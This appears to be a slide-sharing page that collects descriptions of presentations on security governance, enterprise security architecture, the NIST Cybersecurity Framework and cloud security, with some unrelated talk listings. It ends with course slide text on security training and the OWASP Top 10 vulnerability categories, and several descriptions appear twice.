What is GRC – Governance, Risk and Compliance BOC Group
A simple guide to learn what Governance, Risk and Compliance (GRC) is all about, why it’s important and how you can use it to help drive enterprise objectives.
For more information visit: https://www.boc-group.com/governance-risk-and-compliance/
The presentations should help security professionals create security architecture that supports business objectives, covers all areas of security technology, and allows for effective measurement of security value.
The presentation was given at BrighTalk
What is a secure enterprise architecture roadmap?Ulf Mattsson
Webcast title : What is a Secure Enterprise Architecture Roadmap?
Description : This session will cover the following topics:
* What is a Secure Enterprise Architecture roadmap (SEA)?
* Are there different Roadmaps for different industries?
* How does compliance fit in with a SEA?
* Does blockchain, GDPR, Cloud, and IoT conflict with compliance regulations complicating your SEA?
* How will quantum computing impact SEA roadmap?
Presenters : Juanita Koilpillai, Bob Flores, Mark Rasch, Ulf Mattsson, David Morris
Duration : 68 min
Date & Time : Sep 20 2018 8:00 am
Timezone : United States - New York
Webcast URL : https://www.brighttalk.com/webinar/what-is-a-secure-enterprise-architecture-roadmap
HD version: http://1drv.ms/1eR5OQf
This is my publication on how the integration of the TOGAF Enterprise Architecture framework, the SABSA Enterprise Security Architecture framework, and Information Governance discipline add up to a robust and successful Information Security Management Program.
Solution architects must be aware of the need for solution security and of the need to have enterprise-level controls that solutions can adopt.
The sets of components that comprise the extended solution landscape, including those components that provide common or shared functionality, are located in different zones, each with different security characteristics.
The functional and operational design of any solution and therefore its security will include many of these components, including those inherited by the solution or common components used by the solution.
The complete solution security view should refer explicitly to the components and their controls.
While each individual solution should be able to inherit the security controls provided by these components, the solution design should include explicit reference to them for completeness and to avoid unvalidated assumptions.
There is a common and generalised set of components, many of which are shared, within the wider solution topology that should be considered when assessing overall solution architecture and solution security.
Individual solutions must be able to inherit security controls, facilities and standards from common enterprise-level controls, standards, toolsets and frameworks.
Individual solutions must not be forced to implement individual infrastructural security facilities and controls. This is wasteful of solution implementation resources, results in multiple non-standard approaches to security and represents a security risk to the organisation.
The extended solution landscape potentially consists of a large number of interacting components and entities located in different zones, each with different security profiles, requirements and concerns. Different security concerns and therefore controls apply to each of these components.
Solution security is not covered by a single control. It involves multiple overlapping sets of controls providing layers of security.
What is GRC – Governance, Risk and Compliance BOC Group
A simple guide to learn what Governance, Risk and Compliance (GRC) is all about, why it’s important and how you can use it to help drive enterprise objectives.
For more information visit: https://www.boc-group.com/governance-risk-and-compliance/
The presentations should help security professionals create security architecture that supports business objectives, covers all areas of security technology, and allows for effective measurement of security value.
The presentation was given at BrighTalk
What is a secure enterprise architecture roadmap?Ulf Mattsson
Webcast title : What is a Secure Enterprise Architecture Roadmap?
Description : This session will cover the following topics:
* What is a Secure Enterprise Architecture roadmap (SEA)?
* Are there different Roadmaps for different industries?
* How does compliance fit in with a SEA?
* Does blockchain, GDPR, Cloud, and IoT conflict with compliance regulations complicating your SEA?
* How will quantum computing impact SEA roadmap?
Presenters : Juanita Koilpillai, Bob Flores, Mark Rasch, Ulf Mattsson, David Morris
Duration : 68 min
Date & Time : Sep 20 2018 8:00 am
Timezone : United States - New York
Webcast URL : https://www.brighttalk.com/webinar/what-is-a-secure-enterprise-architecture-roadmap
HD version: http://1drv.ms/1eR5OQf
This is my publication on how the integration of the TOGAF Enterprise Architecture framework, the SABSA Enterprise Security Architecture framework, and Information Governance discipline add up to a robust and successful Information Security Management Program.
Solution architects must be aware of the need for solution security and of the need to have enterprise-level controls that solutions can adopt.
The sets of components that comprise the extended solution landscape, including those components that provide common or shared functionality, are located in different zones, each with different security characteristics.
The functional and operational design of any solution and therefore its security will include many of these components, including those inherited by the solution or common components used by the solution.
The complete solution security view should refer explicitly to the components and their controls.
While each individual solution should be able to inherit the security controls provided by these components, the solution design should include explicit reference to them for completeness and to avoid unvalidated assumptions.
There is a common and generalised set of components, many of which are shared, within the wider solution topology that should be considered when assessing overall solution architecture and solution security.
Individual solutions must be able to inherit security controls, facilities and standards from common enterprise-level controls, standards, toolsets and frameworks.
Individual solutions must not be forced to implement individual infrastructural security facilities and controls. This is wasteful of solution implementation resources, results in multiple non-standard approaches to security and represents a security risk to the organisation.
The extended solution landscape potentially consists of a large number of interacting components and entities located in different zones, each with different security profiles, requirements and concerns. Different security concerns and therefore controls apply to each of these components.
Solution security is not covered by a single control. It involves multiple overlapping sets of controls providing layers of security.
Information technology is a complex business, at best. While IT can provide amazing benefits, it still requires vigilance and diligence to ensure it is running correctly and that it is secure. A security framework can be an excellent tool to evaluate what you might be missing and confirm that what you are already doing is spot-on correct. This session will discuss the importance of using security frameworks and walk attendees through the NIST Cyber Security Framework to review how the framework functions, how to use a framework, and most importantly, how the use of a framework can and will benefit their organization.
Solution Architecture And Solution SecurityAlan McSweeney
This describes an approach to embedding security within the technology solution landscape. It describes a security model that encompasses the range of individual solution components up to the entire solution landscape. The solution security model allows the security status of a solution and its constituent delivery and operational components to be tracked wherever those components are located. This provides an integrated approach to solution security across all solution components and across the entire organisation topology of solutions. It allows the solution architect to validate the security of an individual solution. It enables the security status of the entire solution landscape to be assessed and recorded. Solution security is a wicked problem because there is no certainly about when the problem has been resolved and a state of security has been achieved. The security state of a solution can just be expressed along a subjective spectrum of better or worse rather than a binary true or false. Solution security can have negative consequences: prevents types of access, limits availability in different ways, restricts functionality provided, makes solution harder to use, lengthens solution delivery times, increases costs along the entire solution lifecycle, leads to loss of usability, utility and rate of use.
How To Handle Cybersecurity Risk PowerPoint Presentation SlidesSlideTeam
Information technology experts can now take advantage of How To Handle Cybersecurity Risk PowerPoint Presentation Slides. This information security PPT theme infuses top-quality design with data obtained by industry experts. Explain the present situation of the target firm’s information security management employing this PowerPoint layout. The data visualizations featured here simplify the elucidation of complex data such as the analysis of the current IT department. Showcase the cybersecurity framework roadmap and risks of the internet using our PPT presentation. Elaborate on the cybersecurity risk management action plan using the tabular format via this PowerPoint slideshow. Demonstrate the cybersecurity contingency plan with appreciable ease. Our information security management system PPT templates deck assists you in assigning risk handling responsibilities to the staff. Explain the duties of the management in successful information security governance. This PowerPoint presentation also addresses the cost of cybersecurity management and staff training. Hit the download icon and start personalization. Our How To Handle Cybersecurity Risk PowerPoint Presentation Slides are explicit and effective. They combine clarity and concise expression. https://bit.ly/3o0xDkR
Enterprise Security Architecture for Cyber SecurityThe Open Group SA
Cyber Security is one of the major challenges facing organisations within all industries. This presentation will examine the integration of an Enterprise Architecture approach with an Enterprise Security Architecture approach (TOGAF and SABSA) and propose a generic framework.
Download this presentation at http://opengroup.co.za/presentations
Solution Architecture and Solution AcquisitionAlan McSweeney
This describes a systematised and structured approach to solution acquisition or procurement that involves solution architecture from the start. This allows the true scope of both the required and subsequently acquired solution are therefore fully understood. By using such an approach, poor solution acquisition outcomes are avoided.
Solution architecture provides the structured approach to capturing all the cost contributors and knowing the true solution scope.
There is more packaged/product/service-based solution acquisition activity. There is an increasing trend of solutions hosted outside the organisation. Meanwhile solution acquisition outcomes are poor and getting worse.
Poor solution acquisition has long-term consequences and costs.
The to-be-acquired solution needs to operate in and co-exist with an existing solution topography and the solution acquisition process needs to be aware of and take account of this wider solution topography. Cloud-based or externally hosted and provided solutions do not eliminate the need for the solution to exist within the organisation solution topography.
Strategic misrepresentation in solution acquisition is the deliberate distortion or falsification of information relating to solution acquisition costs, complexity, required functionality, solution availability, resource availability, time to implement in order to get solution acquisition approval. Strategic misrepresentation is very real and its consequences can be very damaging.
Solution architecture has the skills and experience to define the real scope of the solution being acquired. An effective structured solution acquisition process, well-implemented and consistently applied, means dependable and repeatable solution acquisition and successful outcomes.
Build an Information Security StrategyAndrew Byers
Organizations are struggling to keep up with today’s evolving threat landscape.
From technology sophistication and business adoption to the proliferation of hacking techniques and the expansion of hacking motivations, organizations are facing major security risks.
Every organization needs some kind of information security program to protect their systems and assets.
Organizations today face pressure from regulatory or legal obligations, customer requirement, and now, senior management expectations.
Almost every business decision requires executives and managers to balance risk and reward, and efficiency in that process is essential to an enterprise’s success. Too often though, IT risk (business risk related to the use of IT) is overlooked.
While other business risks such as market, credit and operational risks have long been incorporated into the decision-making processes, IT risk has usually been relegated to technical specialists outside the boardroom, despite falling under the same risk category as other business risks: failure to achieve strategic objectives.
This session intends to address business risks related to the use of IT, looking at industry standards, frameworks and best practices, as well as focusing on real world examples and specific plans on how to implement IT Risk Management on every level of your company.
Introduction to Risk Management via the NIST Cyber Security FrameworkPECB
The cyber security profession has successfully established explicit guidance for practitioners to implement effective cyber security programs via the NIST Cyber Security Framework (CSF). The CSF provides both a roadmap and a measuring stick for effective cyber security. Application of the CSF within cyber is nothing new, but the resurgence of Enterprise Security Risk Management and Security Convergence highlight opportunities for expanded application for cyber, physical, and personnel security risks. This NIST CSF can help practitioners build a cross-pollenated understanding of holistic risk.
Main points covered:
• Understand the purpose, value, and application of the NIST CSF in familiar non-technical terms.
• Understand how the Functions and Categories of the NIST CSF (the CSF “Core”) and an organization's “current” and “target” profiles are relevant and valuable in a variety of sectors and environments.
• Understand how an organization’s physical and cyber security resources and stakeholders can align with the NIST CSF as a tool to achieve holistic security risk management.
Presenters:
David Feeney, CPP, PMP has 17 years of security industry experience assisting organizations with risk management matters specific to physical, personnel, and cyber security. He has 9 years of experience with service providers and 8 years of experience within enterprise security organizations. David has worked with industry leaders in the energy, technology, healthcare, and real estate sectors. Areas of specialization include Security Operations Center design and management, Security Systems design and implementation, and Enterprise Risk Management. David holds leadership positions in ASIS International and is also a member of the InfraGard FBI program. David holds Certification Protection Professional (CPP) and Project Management Professional (PMP) certifications.
Andrea LeStarge, MS has over ten years of experience in program management, risk analysis and curriculum development. Being specialized in Homeland Security, Andrea leverages her experience in formerly managing projects to support various Federal Government entities in identifying, detecting and responding to man-made, natural and cyber incidents. She has an established track record in recognizing security gaps and corrective risk mitigation options, while effectively communicating findings to stakeholders, private sector owners and operators, and first-responder personnel within tactical, operational and strategic levels. Overall, Andrea encompasses analytical tradecraft and demonstrates consistent, repeatable and defensible methodologies pertaining to risk and the elements of threat, vulnerability and consequence.
Recorded webinar: https://youtu.be/hxpuYtMQgf0
Adopting A Zero-Trust Model. Google Did It, Can You?Zscaler
Based on 6 years of creating zero trust networks at Google, the BeyondCorp framework has led to the popularization of a new network security model within enterprises, called the software-defined perimeter.
Patch management is critical to reducing your attack surface and keeping your endpoints and business running smoothly. Unfortunately, it's also a process that must be repeated weekly, monthly, quarterly, and whenever critical fixes have been identified for your environment. The good news is: with the right tools and some advance planning, this process can run smoothly and leave your IT team with more time to support core business goals.
Join us to learn about trends in patch management, including the latest ways Ivanti is helping Security and IT teams work together like a well-oiled machine.
In today’s connected world, cyber security is a topic that nobody can afford to ignore. In recent years the number and frequency of attacks on industrial devices and other critical infrastructure has risen dramatically. Recent news stories about hackers shutting down critical infrastructure have left many companies wondering if they are vulnerable to similar attacks. In this webinar we will discuss the most common security threats and unique challenges in securing industrial networks. We will introduce the current standards and share some useful resources and best practices for addressing industrial cyber security.
Key Takeaways:
1. Gain perspective regarding common security threats facing industrial networks.
2. Learn about the relevant standards governing industrial cyber security.
3. Increase understanding of some best practices for securing industrial networks.
Enterprise Architecture
Enterprise Architectural Methodologies
A Brief History of Enterprise Architecture
Zachman Framework
Business Attributes
Features & Advantages
SABSA Lifecycle
SABSA Development Process
SMP Maturity Levels
Cognitive Computing: Company presentation by Tomer Weingarten, Co-Founder & CEO of SentinelOne at the NOAH Conference 2019 in Tel Aviv, Hangar 11, 10-11 April 2019.
Information technology is a complex business, at best. While IT can provide amazing benefits, it still requires vigilance and diligence to ensure it is running correctly and that it is secure. A security framework can be an excellent tool to evaluate what you might be missing and confirm that what you are already doing is spot-on correct. This session will discuss the importance of using security frameworks and walk attendees through the NIST Cyber Security Framework to review how the framework functions, how to use a framework, and most importantly, how the use of a framework can and will benefit their organization.
Solution Architecture And Solution SecurityAlan McSweeney
This describes an approach to embedding security within the technology solution landscape. It describes a security model that encompasses the range of individual solution components up to the entire solution landscape. The solution security model allows the security status of a solution and its constituent delivery and operational components to be tracked wherever those components are located. This provides an integrated approach to solution security across all solution components and across the entire organisation topology of solutions. It allows the solution architect to validate the security of an individual solution. It enables the security status of the entire solution landscape to be assessed and recorded. Solution security is a wicked problem because there is no certainly about when the problem has been resolved and a state of security has been achieved. The security state of a solution can just be expressed along a subjective spectrum of better or worse rather than a binary true or false. Solution security can have negative consequences: prevents types of access, limits availability in different ways, restricts functionality provided, makes solution harder to use, lengthens solution delivery times, increases costs along the entire solution lifecycle, leads to loss of usability, utility and rate of use.
How To Handle Cybersecurity Risk PowerPoint Presentation SlidesSlideTeam
Information technology experts can now take advantage of How To Handle Cybersecurity Risk PowerPoint Presentation Slides. This information security PPT theme infuses top-quality design with data obtained by industry experts. Explain the present situation of the target firm’s information security management employing this PowerPoint layout. The data visualizations featured here simplify the elucidation of complex data such as the analysis of the current IT department. Showcase the cybersecurity framework roadmap and risks of the internet using our PPT presentation. Elaborate on the cybersecurity risk management action plan using the tabular format via this PowerPoint slideshow. Demonstrate the cybersecurity contingency plan with appreciable ease. Our information security management system PPT templates deck assists you in assigning risk handling responsibilities to the staff. Explain the duties of the management in successful information security governance. This PowerPoint presentation also addresses the cost of cybersecurity management and staff training. Hit the download icon and start personalization. Our How To Handle Cybersecurity Risk PowerPoint Presentation Slides are explicit and effective. They combine clarity and concise expression. https://bit.ly/3o0xDkR
Enterprise Security Architecture for Cyber SecurityThe Open Group SA
Cyber Security is one of the major challenges facing organisations within all industries. This presentation will examine the integration of an Enterprise Architecture approach with an Enterprise Security Architecture approach (TOGAF and SABSA) and propose a generic framework.
Download this presentation at http://opengroup.co.za/presentations
Solution Architecture and Solution AcquisitionAlan McSweeney
This describes a systematised and structured approach to solution acquisition or procurement that involves solution architecture from the start. This allows the true scope of both the required and subsequently acquired solution are therefore fully understood. By using such an approach, poor solution acquisition outcomes are avoided.
Solution architecture provides the structured approach to capturing all the cost contributors and knowing the true solution scope.
There is more packaged/product/service-based solution acquisition activity. There is an increasing trend of solutions hosted outside the organisation. Meanwhile solution acquisition outcomes are poor and getting worse.
Poor solution acquisition has long-term consequences and costs.
The to-be-acquired solution needs to operate in and co-exist with an existing solution topography and the solution acquisition process needs to be aware of and take account of this wider solution topography. Cloud-based or externally hosted and provided solutions do not eliminate the need for the solution to exist within the organisation solution topography.
Strategic misrepresentation in solution acquisition is the deliberate distortion or falsification of information relating to solution acquisition costs, complexity, required functionality, solution availability, resource availability, time to implement in order to get solution acquisition approval. Strategic misrepresentation is very real and its consequences can be very damaging.
Solution architecture has the skills and experience to define the real scope of the solution being acquired. An effective structured solution acquisition process, well-implemented and consistently applied, means dependable and repeatable solution acquisition and successful outcomes.
Build an Information Security StrategyAndrew Byers
Organizations are struggling to keep up with today’s evolving threat landscape.
From technology sophistication and business adoption to the proliferation of hacking techniques and the expansion of hacking motivations, organizations are facing major security risks.
Every organization needs some kind of information security program to protect their systems and assets.
Organizations today face pressure from regulatory or legal obligations, customer requirement, and now, senior management expectations.
Almost every business decision requires executives and managers to balance risk and reward, and efficiency in that process is essential to an enterprise’s success. Too often though, IT risk (business risk related to the use of IT) is overlooked.
While other business risks such as market, credit and operational risks have long been incorporated into the decision-making processes, IT risk has usually been relegated to technical specialists outside the boardroom, despite falling under the same risk category as other business risks: failure to achieve strategic objectives.
This session intends to address business risks related to the use of IT, looking at industry standards, frameworks and best practices, as well as focusing on real world examples and specific plans on how to implement IT Risk Management on every level of your company.
Introduction to Risk Management via the NIST Cyber Security FrameworkPECB
The cyber security profession has successfully established explicit guidance for practitioners to implement effective cyber security programs via the NIST Cyber Security Framework (CSF). The CSF provides both a roadmap and a measuring stick for effective cyber security. Application of the CSF within cyber is nothing new, but the resurgence of Enterprise Security Risk Management and Security Convergence highlight opportunities for expanded application for cyber, physical, and personnel security risks. This NIST CSF can help practitioners build a cross-pollenated understanding of holistic risk.
Main points covered:
• Understand the purpose, value, and application of the NIST CSF in familiar non-technical terms.
• Understand how the Functions and Categories of the NIST CSF (the CSF “Core”) and an organization's “current” and “target” profiles are relevant and valuable in a variety of sectors and environments.
• Understand how an organization’s physical and cyber security resources and stakeholders can align with the NIST CSF as a tool to achieve holistic security risk management.
Presenters:
David Feeney, CPP, PMP has 17 years of security industry experience assisting organizations with risk management matters specific to physical, personnel, and cyber security. He has 9 years of experience with service providers and 8 years of experience within enterprise security organizations. David has worked with industry leaders in the energy, technology, healthcare, and real estate sectors. Areas of specialization include Security Operations Center design and management, Security Systems design and implementation, and Enterprise Risk Management. David holds leadership positions in ASIS International and is also a member of the InfraGard FBI program. David holds Certification Protection Professional (CPP) and Project Management Professional (PMP) certifications.
Andrea LeStarge, MS has over ten years of experience in program management, risk analysis and curriculum development. Being specialized in Homeland Security, Andrea leverages her experience in formerly managing projects to support various Federal Government entities in identifying, detecting and responding to man-made, natural and cyber incidents. She has an established track record in recognizing security gaps and corrective risk mitigation options, while effectively communicating findings to stakeholders, private sector owners and operators, and first-responder personnel within tactical, operational and strategic levels. Overall, Andrea encompasses analytical tradecraft and demonstrates consistent, repeatable and defensible methodologies pertaining to risk and the elements of threat, vulnerability and consequence.
Recorded webinar: https://youtu.be/hxpuYtMQgf0
Adopting A Zero-Trust Model. Google Did It, Can You?Zscaler
Based on 6 years of creating zero trust networks at Google, the BeyondCorp framework has led to the popularization of a new network security model within enterprises, called the software-defined perimeter.
Patch management is critical to reducing your attack surface and keeping your endpoints and business running smoothly. Unfortunately, it's also a process that must be repeated weekly, monthly, quarterly, and whenever critical fixes have been identified for your environment. The good news is: with the right tools and some advance planning, this process can run smoothly and leave your IT team with more time to support core business goals.
Join us to learn about trends in patch management, including the latest ways Ivanti is helping Security and IT teams work together like a well-oiled machine.
In today’s connected world, cyber security is a topic that nobody can afford to ignore. In recent years the number and frequency of attacks on industrial devices and other critical infrastructure has risen dramatically. Recent news stories about hackers shutting down critical infrastructure have left many companies wondering if they are vulnerable to similar attacks. In this webinar we will discuss the most common security threats and unique challenges in securing industrial networks. We will introduce the current standards and share some useful resources and best practices for addressing industrial cyber security.
Key Takeaways:
1. Gain perspective regarding common security threats facing industrial networks.
2. Learn about the relevant standards governing industrial cyber security.
3. Increase understanding of some best practices for securing industrial networks.
Enterprise Architecture
Enterprise Architectural Methodologies
A Brief History of Enterprise Architecture
Zachman Framework
Business Attributes
Features & Advantages
SABSA Lifecycle
SABSA Development Process
SMP Maturity Levels
Cognitive Computing: Company presentation by Tomer Weingarten, Co-Founder & CEO of SentinelOne at the NOAH Conference 2019 in Tel Aviv, Hangar 11, 10-11 April 2019.
In the ever-evolving, fast-paced Agile development world, application security has not scaled well. Incorporating application security and testing into the current development process is difficult, leading to incomplete tooling or unorthodox stoppages due to the required manual security assessments. Development teams are working with a backlog of stories—stories that are typically focused on features and functionality instead of security. Traditionally, security was viewed as a prevention of progress, but there are ways to incorporate security activities without hindering development. There are many types of security activities you can bake into your current development lifecycles—tooling, assessments, stories, scrums, iterative reviews, repo and bug tracking integrations—every organization has a unique solution and there are positives and negatives to each of them. In this slide deck, we go through the various solutions to help build security into the development process.
Webinar presentation: November 17, 2016
Subject matter experts from the CSCC present an overview of the security standards, frameworks, and certifications that exist for cloud computing. We also discuss privacy considerations in light of new regulations (e.g., EU’s General Data Protection Regulation (GDPR)). This presentation helps cloud customers understand and distinguish between the different types of security standards that exist and assess the security standards support of their cloud service providers.
Read the CSCC's deliverable, Cloud Security Standards: What to Expect and What to Negotiate: http://www.cloud-council.org/deliverables/cloud-security-standards-what-to-expect-and-what-to-negotiate.htm
Webinar presentation September 20, 2016.
This deck introduces the CSCC’s deliverable, Cloud Security Standards: What to Expect and What to Negotiate V2.0, which was updated in August 2016 to reflect the latest developments in cloud security standards. The presentation is an overview of the various security standards, frameworks, and certifications that exist for cloud computing. This information will help cloud customers understand and distinguish between the different types of security standards that exist and assess the security standards support of their cloud service providers.
Read the CSCC's deliverable here: http://www.cloud-council.org/deliverables/cloud-security-standards-what-to-expect-and-what-to-negotiate.htm
Outpost24 webinar: cloud providers ate hosting companies' lunch, what's next?...Outpost24
AWS, Azure and Google Cloud have disrupted the traditional infrastructure market. After realizing that security is a major roadblock to cloud adoption, they are putting money and effort to built-in security features. But hybrid setups remain a challenge for companies and there is a learning curve for security teams to be proficient on cloud. Find out how to choose the best toolset to secure your data in the cloud.
Enterprise DevOps is different then DevOps in startups and smaller companies. This session how AWS/CSC address this. How AWS IaaS level automation via CloudFormation, UserData, Console, APIS and some PaaS OpsWorks/Beanstalk is complimented by CSC Agility Platform. CSC Agility adds application compliance and security to the AWS infrastructure compliance and security. CSC Agility allows for the creation of architecture blueprints for predefined application offerings.
Azure 101: Shared responsibility in the Azure CloudPaulo Renato
Whether you’re working exclusively on Azure or with multiple cloud environments, there are certain things you should consider when moving assets to the public cloud. As with any cloud deployment, security is a top priority, and moving your workloads to the Azure cloud doesn’t mean you’re not responsible for the security of your operating system, applications, and data.
Building on the security of the Azure infrastructure, this shared security responsibility starts with making sure your environment is secure. In this session, we will discuss step-by-step what you need to do to secure access at the administrative, application and network layers.
Security and DevOps: Agility and Teamwork - SID315 - re:Invent 2017Amazon Web Services
In this session, you learn pragmatic steps to integrate security controls into DevOps processes in your AWS environment at scale. Cyber security expert and founder of Alert Logic Misha Govshteyn shares insights from high performing teams who are embracing the reality that an agile security program can enable faster and more secure workload deployments. Joining Misha is Joey Peloquin, Director of Cloud Security Operations at Citrix, who discusses Citrix’s DevOps experiences and how they manage their cyber security posture within the AWS Cloud.
Session sponsored by Alert Logic
This presentation includes cloud security overview, Could Security Access Broker, CASB's four pillars, proxy and API deployment mode and advantage and limitation of deployment modes
(ENT202) Four Critical Things to Consider When Moving Your Core Business Appl...Amazon Web Services
Does moving core business applications to AWS make sense for your organization? This session covers key business and IT considerations gathered from industry experts and real-world enterprise customers who have chosen to move their mission critical ERP applications to the AWS cloud, resulting in lower costs and better service.
This session covers the following:
- Insights from industry experts and analysts, who explain how the cloud affects costs from three angles: launch, operations, and long-term infrastructure expense
- Review of how time-to-value and cloud launch processes differ from on-premises infrastructure
- How AWS offers increased security and reliability over what some enterprises can afford on their own
Sponsored by Infor
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf91mobiles
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
2. DOMAIN 4 TOPICS
1. Recognize the need for training and awareness in application security
2. Understand cloud software assurance and validation
3. Use verified secure software
4. Comprehend the software development life-cycle (SDLC) process
5. Apply the secure software development life-cycle
6. Comprehend the specifics of cloud application architecture
7. Design appropriate identity and access management (IAM) solutions
3. 1. TRAINING AND AWARENESS
A. Cloud Development Basics
B. Common Pitfalls
C. Common Vulnerabilities (e.g., OWASP Top 10)
4. 1. TRAINING AND AWARENESS:
DEFINITIONS
• Training: “The formal presentation of material, often delivered by internal subject
matter experts. It addresses and explains matters of the organization’s policies,
content mandated by regulation, and industry best practices for the organization’s
field.”
• Education: “The formal presentation of material in an academic setting, often for
credit toward a degree.”
• Awareness: “The additional, informal, often voluntary presentation of material for
the purpose of reminding and raising attention among staff.”
5. 1. TRAINING AND AWARENESS:
TRAINING CATEGORIES
• Initial training:
• delivered when personnel first enter the employ of the organization
• Covers security policies and procedures all staff are expected to understand
• Examples of content: password policy, physical security, use of security credentials or tokens,
how to report security concerns, acceptable use policy
• Best if done in-person
• Recurring training:
• At least once per year
• Topics include updates to security practices and procedures, changes to regulations and
policies, new elements in the infrastructure
• Refresher training:
• Given to personnel who need additional lessons (e.g., extended absence, missed recurring
training session, failed a security practice, etc.)
6. 1A. CLOUD DEVELOPMENT BASICS
Cloud development and applications can differ from traditional/on-premises development
(“Forklifting” not always an option)
• Data sensitivity issues in cloud - (more on this later)
• Need to understand service models (e.g., IaaS, PaaS, SaaS) and roles and responsibilities of
each (each model requires different levels of security responsibility on the part of the
customer)
• Need to understand deployment models (e.g., public, private, cloud, community, hybrid) and
who is responsible for security controls in each
• Understand RESTful vs SOAP APIs (more on this later)
• Multitenancy – tenancy separation prevents data leaks between customers
• Application Virtualization – running full applications in a protected space (e.g., WINE)(more
later)
• Cryptography – be familiar with different types, where it is used, and use case for each (more
later)
• Sandboxing – protected area for testing untested and untrusted code (more later)
7. 1B. COMMON PITFALLS
• On-premises does not always transfer
• Not all apps are cloud-ready
• Lack of training and awareness
• Lack of documentation and guidelines
• Complexities of integration (use of secure, validated APIs)
• Multitenancy (tenancy separation)
• Third-party administrators
8. 1C. COMMON VULNERABILITIES
(2017 OWASP TOP 10)
1. Injection
2. Broken Authentication
3. Sensitive Data Exposure
4. XML External Entities (XXE)
5. Broken Access Control
6. Security Misconfiguration
7. Cross-Site Scripting (XSS)
8. Insecure Deserialization
9. Using components with Known Vulnerabilities
10. Insufficient Logging and Monitoring
(More on these later)
9. 2. CLOUD SOFTWARE ASSURANCE
AND VALIDATION
A. Cloud-based Functional Testing
B. Cloud Secure Development Lifecycle
